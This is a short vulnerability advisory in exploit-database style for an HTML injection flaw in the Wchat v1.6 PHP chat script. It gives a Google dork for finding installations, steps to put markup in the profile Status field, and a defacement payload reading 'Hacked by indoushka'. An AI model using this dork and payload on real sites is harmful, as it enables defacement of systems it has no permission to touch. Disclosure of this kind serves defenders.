====================================================================================================================================
| # Title     : Wchat v1.6 - Fully Responsive PHP AJAX Chat Script Html code inject Vulnerability                                  |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            |
| # Vendor    : https://www.codelist.cc/scripts/235860-wchat-v16-fully-responsive-php-ajax-chat-script-nulled.html                 |  
| # Dork      : Wchat - Admin Login                                                                                                |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine .

[+] Create your account and go to "Edit profile" https://127.0.0.1/products/wchat-php-script/edit_profile.php

[+] in Status Put your code 

[+] arbitrary html C0D3 : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>

[+] https://127.0.0.1/products/wchat-php-script/login.php 

Greetings to :===================================================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg|
=================================================================================================================